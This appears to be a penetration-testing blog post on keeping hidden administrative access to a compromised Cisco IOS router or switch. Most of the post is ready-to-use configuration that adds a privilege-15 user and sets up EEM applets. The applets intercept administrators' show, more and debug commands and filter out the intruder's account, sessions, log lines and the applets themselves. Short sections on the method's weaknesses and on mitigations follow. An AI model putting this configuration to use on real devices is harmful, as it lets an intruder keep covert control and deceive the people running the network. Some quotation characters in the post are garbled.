đ„Penetration Testing: How to Hide an Admin User on Cisco IOS (Router/Switch) Platform
Beginning Reminder: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access.
Okay, so hereâs the scenario. You found you way into an elevated command prompt on a Cisco router, and you want to establish a persistent foothold on the device while leaving as few markers as possible. You need to do this with existing code, and youâd like to alter as little as possible. Ciscoâs EEM is the answer.
Cisco EEM is a programming language built into any modern Cisco IOS switch or router. It allows for all sorts of automatic actions to take place, and it also allows a key feature which weâll exploit hereâââit can âcatchâ a string a user enters and transparently replace it with another stringâââone which weâll instruct to exclude our âmaliciousâ pivot code.
Okay, so youâre on an exec command line, whatâs next?
Create a user all your own with exec (priv 15) permissions:
! Note: Make sure the username contains the string âhiddenâ, because those are the lines we are hiding from the configuration below
config t
username hidden_YourUser priv 15 sec yourPassword1234
2. Install a few EEM functions, which do the following:
Hide our user and history from any valid admins by proxying valid commands with commands filtered to hide our information.
EEM Code:
! Hides the EEM code from the running config show command
event manager applet hidden_eemRunningConfig
event cli pattern âshow runâ sync yes
action 0.0 cli command âenableâ
action 1.0 cli command âshow run | ex hidden|event|actionâ
action 2.0 puts â$_cli_resultâ
! Hides the EEM code from the startup config show command
event manager applet hidden_eemStartupConfig
event cli pattern âshow runâ sync yes
action 0.0 cli command âenableâ
action 1.0 cli command âshow start | ex hidden|event|actionâ
action 2.0 puts â$_cli_resultâ
! Hides the bad actorâs active VTY (telnet/ssh) session
event manager applet hidden_VTY
event cli pattern âshow usersâ sync yes
action 0.0 cli command âenableâ
action 1.0 cli command âshow users | ex hiddenâ
action 2.0 puts â$_cli_resultâ
! Hides the bad actorâs active SSH session
event manager applet hidden_sshSession
event cli pattern âshow sshâ sync yes
action 0.0 cli command âenableâ
action 1.0 cli command âshow ssh | ex hiddenâ
action 2.0 puts â$_cli_resultâ
! Hides the EEM actions from showing up in local logging via show command
event manager applet hidden_eemLogging
event cli pattern âshow logâ sync yes
action 0.0 cli command âenableâ
action 1.0 cli command âshow log | ex HA_EM|hiddenâ
action 2.0 puts â$_cli_resultâ
! Hides the EEM and new user from showing up in more system:runningâ command
event manager applet hidden_moreRunning
event cli pattern âmore system:running-configâ sync yes
action 0.0 cli command âenableâ
action 1.0 cli command âmore system:run | ex hidden|event|actionâ
action 2.0 puts â$_cli_resultâ
! Hides the EEM and new user from showing up in more system:startâ command
event manager applet hidden_moreStart
event cli pattern âmore system:running-configâ sync yes
action 0.0 cli command âenableâ
action 1.0 cli command âmore system:start | ex hidden|event|actionâ
action 2.0 puts â$_cli_resultâ
! Prevents EEM from being debugged, which could catch our malicious EEMs in action
event manager applet hidden_EEMdebug
event cli pattern âdebug event managerâ sync yes
action 0.0 cli command âenableâ
Weaknesses of This Method
Syslog/external loggingâââNo ability to hide the execution of commands in real-time, so they will be logged to an external server if device set up to do so.
All EEM scripts are hidden using this method. If administrators utilize EEM for their admin duties, they may become suspicious that their EEM scripts have disappeared.
Config backup. If the tool uses snmp to pull a full config, your new config and user are visible. If the tool is like most tools, and simply uses a service account to programmatically run âshow runâ, your config will stay hidden.
The local log of the device will have many hidden lines in its buffer, so it will look short to someone looking closely.
If the local log uses line numbers, as recommended by Cisco security best practice (but which is not the default config!), itâll be evident to someone looking closely that lines are missing.
Mitigation for Administrators
1. Syslog, syslog, syslog. First, to catch the immediate changes by frequent synchronization to catch the initial changes. Second, to catch the EEM in action, as it catches the legitimate userâs commands and hides itself. Third, to catch any further activity by the bad actor as they perform future activities on the system.
Recommendations for Cisco to Fix This Issue
1. Donât allow aliasing of existing commands. This is messy programming, and allows many opportunities to cripple a router and confuse admins.
Ending Reminder: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access.